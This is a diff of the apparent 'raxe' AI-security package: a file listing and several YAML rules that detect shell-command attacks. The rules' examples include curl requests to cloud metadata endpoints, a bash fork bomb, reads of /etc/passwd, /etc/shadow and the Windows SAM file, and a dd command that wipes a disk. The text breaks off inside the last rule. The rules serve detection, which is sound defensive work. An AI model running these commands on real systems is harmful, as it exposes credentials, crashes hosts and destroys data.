- raxe/packs/core/v1.0.0/rules/hc/hc-156@1.0.0.yaml +37 -0
- raxe/packs/core/v1.0.0/rules/hc/hc-157@1.0.0.yaml +37 -0
- raxe/packs/core/v1.0.0/rules/hc/hc-158@1.0.0.yaml +37 -0
- raxe/packs/core/v1.0.0/rules/hc/hc-159@1.0.0.yaml +37 -0
- raxe/packs/core/v1.0.0/rules/hc/hc-160@1.0.0.yaml +37 -0
- raxe/packs/core/v1.0.0/rules/hc/hc-161@1.0.0.yaml +37 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-001@1.0.0.yaml +47 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-009@1.0.0.yaml +47 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-020@1.0.0.yaml +47 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-021@1.0.0.yaml +46 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-022@1.0.0.yaml +47 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-028@1.0.0.yaml +43 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-033@1.0.0.yaml +46 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-034@1.0.0.yaml +46 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-036@1.0.0.yaml +41 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-039@1.0.0.yaml +41 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-056@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-066@1.0.0.yaml +37 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-076@1.0.0.yaml +37 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-098@1.0.0.yaml +46 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-103@1.0.0.yaml +47 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-104@1.0.0.yaml +52 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-105@1.0.0.yaml +56 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-110@1.0.0.yaml +56 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-111@1.0.0.yaml +57 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-112@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-113@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-114@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-115@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-116@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-117@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-118@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-119@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-120@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-121@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-122@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-123@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-124@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-125@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-126@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-127@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-128@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-129@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-130@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-131@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-132@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-133@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-134@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-135@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-136@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-137@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-138@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-139@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-140@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-141@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-142@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-143@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-144@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-145@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-146@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-147@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-148@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-149@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-150@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-151@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-152@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-153@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-154@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-155@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-156@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-157@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-158@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-159@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-160@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-161@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-162@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-201@1.0.0.yaml +40 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-202@1.0.0.yaml +41 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-203@1.0.0.yaml +51 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-204@1.0.0.yaml +50 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-205@1.0.0.yaml +50 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-206@1.0.0.yaml +50 -0
- raxe/packs/core/v1.0.0/rules/jb/jb-207@1.0.0.yaml +49 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-001@1.0.0.yaml +48 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-009@1.0.0.yaml +48 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-012@1.0.0.yaml +48 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-017@1.0.0.yaml +48 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-022@1.0.0.yaml +47 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-025@1.0.0.yaml +47 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-027@1.0.0.yaml +47 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-028@1.0.0.yaml +47 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-034@1.0.0.yaml +47 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-037@1.0.0.yaml +47 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-040@1.0.0.yaml +47 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-041@1.0.0.yaml +47 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-044@1.0.0.yaml +47 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-050@1.0.0.yaml +57 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-051@1.0.0.yaml +53 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-052@1.0.0.yaml +52 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-053@1.0.0.yaml +56 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-054@1.0.0.yaml +53 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-055@1.0.0.yaml +51 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-056@1.0.0.yaml +51 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-058@1.0.0.yaml +47 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-2015@1.0.0.yaml +41 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-2025@1.0.0.yaml +35 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-2026@1.0.0.yaml +39 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-2035@1.0.0.yaml +39 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-2037@1.0.0.yaml +39 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-2042@1.0.0.yaml +39 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3001@1.0.0.yaml +39 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3002@1.0.0.yaml +41 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3003@1.0.0.yaml +36 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3004@1.0.0.yaml +41 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3005@1.0.0.yaml +39 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3006@1.0.0.yaml +35 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3007@1.0.0.yaml +37 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3008@1.0.0.yaml +35 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3009@1.0.0.yaml +42 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3010@1.0.0.yaml +39 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3011@1.0.0.yaml +35 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3012@1.0.0.yaml +35 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3013@1.0.0.yaml +36 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3014@1.0.0.yaml +36 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3015@1.0.0.yaml +42 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3016@1.0.0.yaml +42 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3017@1.0.0.yaml +40 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3018@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3019@1.0.0.yaml +40 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3020@1.0.0.yaml +40 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3021@1.0.0.yaml +39 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3022@1.0.0.yaml +36 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3023@1.0.0.yaml +41 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3024@1.0.0.yaml +37 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3025@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3026@1.0.0.yaml +42 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3027@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3028@1.0.0.yaml +42 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3029@1.0.0.yaml +36 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3030@1.0.0.yaml +42 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3031@1.0.0.yaml +37 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3032@1.0.0.yaml +42 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3033@1.0.0.yaml +39 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3034@1.0.0.yaml +40 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3035@1.0.0.yaml +43 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3036@1.0.0.yaml +41 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3037@1.0.0.yaml +35 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3038@1.0.0.yaml +35 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3039@1.0.0.yaml +35 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3040@1.0.0.yaml +41 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3041@1.0.0.yaml +39 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3042@1.0.0.yaml +36 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3043@1.0.0.yaml +35 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3044@1.0.0.yaml +43 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3045@1.0.0.yaml +36 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3046@1.0.0.yaml +37 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3047@1.0.0.yaml +36 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3048@1.0.0.yaml +36 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3049@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3050@1.0.0.yaml +44 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3051@1.0.0.yaml +35 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3052@1.0.0.yaml +36 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3053@1.0.0.yaml +35 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3054@1.0.0.yaml +35 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3055@1.0.0.yaml +40 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3056@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3057@1.0.0.yaml +40 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3058@1.0.0.yaml +43 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3059@1.0.0.yaml +42 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3060@1.0.0.yaml +42 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3061@1.0.0.yaml +50 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3062@1.0.0.yaml +50 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3063@1.0.0.yaml +54 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3064@1.0.0.yaml +78 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3065@1.0.0.yaml +84 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3066@1.0.0.yaml +84 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3067@1.0.0.yaml +88 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3068@1.0.0.yaml +94 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3069@1.0.0.yaml +90 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3070@1.0.0.yaml +99 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3071@1.0.0.yaml +91 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3072@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3073@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3074@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3075@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3076@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3077@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3078@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3079@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3080@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3081@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3082@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3083@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3084@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/pii/pii-3085@1.0.0.yaml +38 -0
- raxe/packs/core/v1.0.0/rules/rag/rag-016@1.0.0.yaml +47 -0
- raxe/packs/core/v1.0.0/rules/rag/rag-028@1.0.0.yaml +47 -0
- raxe/packs/core/v1.0.0/rules/rag/rag-042@1.0.0.yaml +47 -0
- raxe/packs/core/v1.0.0/rules/rag/rag-044@1.0.0.yaml +47 -0
- raxe/packs/core/v1.0.0/rules/rag/rag-045@1.0.0.yaml +47 -0
- raxe/packs/core/v1.0.0/rules/rag/rag-050@1.0.0.yaml +47 -0
- raxe/packs/core/v1.0.0/rules/rag/rag-201@1.0.0.yaml +41 -0
- raxe/packs/core/v1.0.0/rules/rag/rag-202@1.0.0.yaml +41 -0
- raxe/packs/core/v1.0.0/rules/rag/rag-3001@1.0.0.yaml +41 -0
- raxe/packs/core/v1.0.0/rules/rag/rag-3006@1.0.0.yaml +41 -0
- raxe/packs/core/v1.0.0/rules/rag/rag-3009@1.0.0.yaml +41 -0
- raxe/packs/core/v1.0.0/rules/rag/rag-3012@1.0.0.yaml +41 -0
- raxe/plugins/__init__.py +98 -0
- raxe/plugins/custom_rules.py +380 -0
- raxe/plugins/loader.py +389 -0
- raxe/plugins/manager.py +538 -0
- raxe/plugins/protocol.py +428 -0
- raxe/py.typed +0 -0
- raxe/sdk/__init__.py +77 -0
- raxe/sdk/agent_scanner.py +1918 -0
- raxe/sdk/client.py +1603 -0
- raxe/sdk/decorator.py +175 -0
- raxe/sdk/exceptions.py +859 -0
- raxe/sdk/integrations/__init__.py +277 -0
- raxe/sdk/integrations/agent_scanner.py +71 -0
- raxe/sdk/integrations/autogen.py +872 -0
- raxe/sdk/integrations/crewai.py +1368 -0
- raxe/sdk/integrations/dspy.py +845 -0
- raxe/sdk/integrations/extractors.py +363 -0
- raxe/sdk/integrations/huggingface.py +395 -0
- raxe/sdk/integrations/langchain.py +948 -0
- raxe/sdk/integrations/litellm.py +484 -0
- raxe/sdk/integrations/llamaindex.py +1049 -0
- raxe/sdk/integrations/portkey.py +831 -0
- raxe/sdk/suppression_context.py +215 -0
- raxe/sdk/wrappers/__init__.py +163 -0
- raxe/sdk/wrappers/anthropic.py +310 -0
- raxe/sdk/wrappers/openai.py +221 -0
- raxe/sdk/wrappers/vertexai.py +484 -0
- raxe/utils/__init__.py +12 -0
- raxe/utils/error_sanitizer.py +135 -0
- raxe/utils/logging.py +241 -0
- raxe/utils/performance.py +414 -0
- raxe/utils/profiler.py +339 -0
- raxe/utils/validators.py +170 -0
- raxe-0.4.6.dist-info/METADATA +471 -0
- raxe-0.4.6.dist-info/RECORD +668 -0
- raxe-0.4.6.dist-info/WHEEL +5 -0
- raxe-0.4.6.dist-info/entry_points.txt +2 -0
- raxe-0.4.6.dist-info/licenses/LICENSE +56 -0
- raxe-0.4.6.dist-info/top_level.txt +1 -0
|
@@ -0,0 +1,45 @@
|
|
|
1
|
+
version: 1.0.0
|
|
2
|
+
rule_id: cmd-075
|
|
3
|
+
family: CMD
|
|
4
|
+
sub_family: shell_commands
|
|
5
|
+
name: Detects cloud metadata service access (AWS, Azure, GCP)
|
|
6
|
+
description: Detects cloud metadata service access (AWS, Azure, GCP)
|
|
7
|
+
severity: critical
|
|
8
|
+
confidence: 0.98
|
|
9
|
+
patterns:
|
|
10
|
+
- pattern: (?i)169\.254\.169\.254
|
|
11
|
+
flags:
|
|
12
|
+
- IGNORECASE
|
|
13
|
+
timeout: 5.0
|
|
14
|
+
- pattern: (?i)metadata\.(?:google|azure)\.(?:com|internal)
|
|
15
|
+
flags:
|
|
16
|
+
- IGNORECASE
|
|
17
|
+
timeout: 5.0
|
|
18
|
+
- pattern: http://(?:instance-data|metadata)\.ec2
|
|
19
|
+
flags: []
|
|
20
|
+
timeout: 5.0
|
|
21
|
+
examples:
|
|
22
|
+
should_match:
|
|
23
|
+
- curl http://169.254.169.254/latest/meta-data/
|
|
24
|
+
- wget http://metadata.google.internal/computeMetadata/v1/
|
|
25
|
+
- http://metadata.azure.com/metadata/instance
|
|
26
|
+
should_not_match:
|
|
27
|
+
- Cloud metadata service documentation
|
|
28
|
+
- AWS instance metadata explained
|
|
29
|
+
- GCP metadata API reference
|
|
30
|
+
metrics:
|
|
31
|
+
precision: null
|
|
32
|
+
recall: null
|
|
33
|
+
f1_score: null
|
|
34
|
+
last_evaluated: null
|
|
35
|
+
mitre_attack:
|
|
36
|
+
- T1552
|
|
37
|
+
metadata:
|
|
38
|
+
created: '2025-11-09'
|
|
39
|
+
updated: '2025-11-09'
|
|
40
|
+
author: raxe-ce
|
|
41
|
+
legacy_rx_id: RX-CMD-0075
|
|
42
|
+
rule_hash: sha256:f000f5c57205bab0d9e0e0c661785846a392d3908964e7f8689cac684b9d3323
|
|
43
|
+
risk_explanation: Shell command injection exploits enable arbitrary system command execution through vulnerable inputs. Attackers can read sensitive files, modify system configurations, escalate privileges, install backdoors, or completely compromise the underlying system.
|
|
44
|
+
remediation_advice: Never execute shell commands with user-controlled input. If command execution is necessary, use strict allowlisting of permitted commands and arguments. Implement input validation and sanitization. Use least-privilege execution contexts. Deploy command injection detection.
|
|
45
|
+
docs_url: https://github.com/raxe-ai/raxe-ce/wiki/CMD-075-Cloud-Metadata-Service
|
|
@@ -0,0 +1,44 @@
|
|
|
1
|
+
version: 1.0.0
|
|
2
|
+
rule_id: cmd-079
|
|
3
|
+
family: CMD
|
|
4
|
+
sub_family: shell_commands
|
|
5
|
+
name: Detects fork bomb and resource exhaustion patterns
|
|
6
|
+
description: Detects fork bomb and resource exhaustion patterns
|
|
7
|
+
severity: critical
|
|
8
|
+
confidence: 0.99
|
|
9
|
+
patterns:
|
|
10
|
+
- pattern: ':\(\)\{\s*:\|:&\s*\};:'
|
|
11
|
+
flags: []
|
|
12
|
+
timeout: 5.0
|
|
13
|
+
- pattern: (?i)while\s*:\s*;\s*do\s+fork
|
|
14
|
+
flags:
|
|
15
|
+
- IGNORECASE
|
|
16
|
+
timeout: 5.0
|
|
17
|
+
- pattern: \.\(\)\.\|\.\.&
|
|
18
|
+
flags: []
|
|
19
|
+
timeout: 5.0
|
|
20
|
+
examples:
|
|
21
|
+
should_match:
|
|
22
|
+
- ':(){ :|:& };:'
|
|
23
|
+
- 'while : ; do fork; done'
|
|
24
|
+
- .().|..&
|
|
25
|
+
should_not_match:
|
|
26
|
+
- Fork bomb explanation
|
|
27
|
+
- Bash infinite loop examples
|
|
28
|
+
- Resource limits in Linux
|
|
29
|
+
metrics:
|
|
30
|
+
precision: null
|
|
31
|
+
recall: null
|
|
32
|
+
f1_score: null
|
|
33
|
+
last_evaluated: null
|
|
34
|
+
mitre_attack:
|
|
35
|
+
- T1059
|
|
36
|
+
metadata:
|
|
37
|
+
created: '2025-11-09'
|
|
38
|
+
updated: '2025-11-09'
|
|
39
|
+
author: raxe-ce
|
|
40
|
+
legacy_rx_id: RX-CMD-0079
|
|
41
|
+
rule_hash: sha256:6c09e2f52868e498610ff3d06759c44715a07b0d0cc946cd8a814313e5ede61a
|
|
42
|
+
risk_explanation: Shell command injection exploits enable arbitrary system command execution through vulnerable inputs. Attackers can read sensitive files, modify system configurations, escalate privileges, install backdoors, or completely compromise the underlying system.
|
|
43
|
+
remediation_advice: Never execute shell commands with user-controlled input. If command execution is necessary, use strict allowlisting of permitted commands and arguments. Implement input validation and sanitization. Use least-privilege execution contexts. Deploy command injection detection.
|
|
44
|
+
docs_url: https://github.com/raxe-ai/raxe-ce/wiki/CMD-079-Fork-Bomb
|
|
@@ -0,0 +1,41 @@
|
|
|
1
|
+
version: 1.0.0
|
|
2
|
+
rule_id: cmd-1080
|
|
3
|
+
family: CMD
|
|
4
|
+
sub_family: shell_operators
|
|
5
|
+
name: Detects semicolon with password file access
|
|
6
|
+
description: Detects semicolon with password file access
|
|
7
|
+
severity: critical
|
|
8
|
+
confidence: 0.99
|
|
9
|
+
patterns:
|
|
10
|
+
- pattern: ;\s*cat\s+/etc/passwd
|
|
11
|
+
flags: []
|
|
12
|
+
timeout: 5.0
|
|
13
|
+
- pattern: ;\s*type\s+.*\\SAM
|
|
14
|
+
flags: []
|
|
15
|
+
timeout: 5.0
|
|
16
|
+
- pattern: ;\s*cat\s+/etc/shadow
|
|
17
|
+
flags: []
|
|
18
|
+
timeout: 5.0
|
|
19
|
+
examples:
|
|
20
|
+
should_match:
|
|
21
|
+
- command; cat /etc/passwd
|
|
22
|
+
- test; cat /etc/shadow
|
|
23
|
+
- exec; type C:\Windows\System32\config\SAM
|
|
24
|
+
should_not_match:
|
|
25
|
+
- Semicolon in shell commands
|
|
26
|
+
- cat command documentation
|
|
27
|
+
- File system security
|
|
28
|
+
metrics:
|
|
29
|
+
precision: null
|
|
30
|
+
recall: null
|
|
31
|
+
f1_score: null
|
|
32
|
+
last_evaluated: null
|
|
33
|
+
metadata:
|
|
34
|
+
created: '2025-11-09'
|
|
35
|
+
updated: '2025-11-09'
|
|
36
|
+
author: raxe-ce
|
|
37
|
+
legacy_rx_id: RX-CMD-1080
|
|
38
|
+
rule_hash: sha256:935f55ab5e9955e3d7dd28e1fba7dd5374f0605a607765d19c4a423b6385a9ec
|
|
39
|
+
risk_explanation: Shell operator injection uses special characters (semicolons, pipes, redirects) to chain commands or modify command behavior. This enables attackers to execute multiple malicious operations or redirect output to exfiltrate data.
|
|
40
|
+
remediation_advice: Sanitize or reject shell operator characters in user input. Use parameterized command execution that prevents operator interpretation. Implement strict allowlisting of permitted command structures. Monitor for command chaining attempts.
|
|
41
|
+
docs_url: https://github.com/raxe-ai/raxe-ce/wiki/CMD-1080-Semicolon-Password
|
|
@@ -0,0 +1,41 @@
|
|
|
1
|
+
version: 1.0.0
|
|
2
|
+
rule_id: cmd-1090
|
|
3
|
+
family: CMD
|
|
4
|
+
sub_family: unix_commands
|
|
5
|
+
name: Detects dd for disk manipulation
|
|
6
|
+
description: Detects dd for disk manipulation
|
|
7
|
+
severity: critical
|
|
8
|
+
confidence: 0.98
|
|
9
|
+
patterns:
|
|
10
|
+
- pattern: \bdd\s+if=/dev/\w+\s+of=
|
|
11
|
+
flags: []
|
|
12
|
+
timeout: 5.0
|
|
13
|
+
- pattern: \bdd\s+if=[^\s]+\s+of=/dev/\w+
|
|
14
|
+
flags: []
|
|
15
|
+
timeout: 5.0
|
|
16
|
+
- pattern: \bdd\s+[^\n]*bs=\d+[MG]
|
|
17
|
+
flags: []
|
|
18
|
+
timeout: 5.0
|
|
19
|
+
examples:
|
|
20
|
+
should_match:
|
|
21
|
+
- dd if=/dev/sda of=/tmp/disk.img
|
|
22
|
+
- dd if=malware of=/dev/sdb
|
|
23
|
+
- dd if=/dev/zero of=/dev/sda bs=1M
|
|
24
|
+
should_not_match:
|
|
25
|
+
- dd command documentation
|
|
26
|
+
- Disk cloning with dd
|
|
27
|
+
- Creating bootable USB with dd
|
|
28
|
+
metrics:
|
|
29
|
+
precision: null
|
|
30
|
+
recall: null
|
|
31
|
+
f1_score: null
|
|
32
|
+
last_evaluated: null
|
|
33
|
+
metadata:
|
|
34
|
+
created: '2025-11-09'
|
|
35
|
+
updated: '2025-11-09'
|
|
36
|
+
author: raxe-ce
|
|
37
|
+
legacy_rx_id: RX-CMD-1090
|
|
38
|
+
rule_hash: sha256:ce96e6202739f29aa9ac1b9d4413ed969ca0a11387d27d618ad59282b165a6a0
|
|
39
|
+
risk_explanation: Dangerous Unix commands (dd, rm -rf, mkfs) can destroy data, corrupt file systems, or cause denial of service. These commands are particularly risky because they can cause irrecoverable damage to systems and data.
|
|
40
|
+
remediation_advice: Implement strict command allowlisting that excludes dangerous utilities. Use read-only file systems where possible. Deploy command execution monitoring and anomaly detection. Restrict access to destructive commands through permissions.
|
|
41
|
+
docs_url: https://github.com/raxe-ai/raxe-ce/wiki/CMD-1090-Dd-Disk
|
|
@@ -0,0 +1,44 @@
|
|
|
1
|
+
version: 1.0.0
|
|
2
|
+
rule_id: cmd-1104
|
|
3
|
+
family: CMD
|
|
4
|
+
sub_family: file_access
|
|
5
|
+
name: Detects Windows SAM file access
|
|
6
|
+
description: Detects Windows SAM file access
|
|
7
|
+
severity: critical
|
|
8
|
+
confidence: 0.99
|
|
9
|
+
patterns:
|
|
10
|
+
- pattern: (?i)(?:type|copy|dir|cat|more)?\s*C:\\\\Windows\\\\System32\\\\config\\\\SAM
|
|
11
|
+
flags:
|
|
12
|
+
- IGNORECASE
|
|
13
|
+
timeout: 5.0
|
|
14
|
+
- pattern: (?i)(?:type|copy|dir|cat|more)?\s*C:\\\\Windows\\\\System32\\\\config\\\\SYSTEM
|
|
15
|
+
flags:
|
|
16
|
+
- IGNORECASE
|
|
17
|
+
timeout: 5.0
|
|
18
|
+
- pattern: (?i)(?:type|copy|dir|cat|more)?\s*%SystemRoot%\\\\System32\\\\config\\\\
|
|
19
|
+
flags:
|
|
20
|
+
- IGNORECASE
|
|
21
|
+
timeout: 5.0
|
|
22
|
+
examples:
|
|
23
|
+
should_match:
|
|
24
|
+
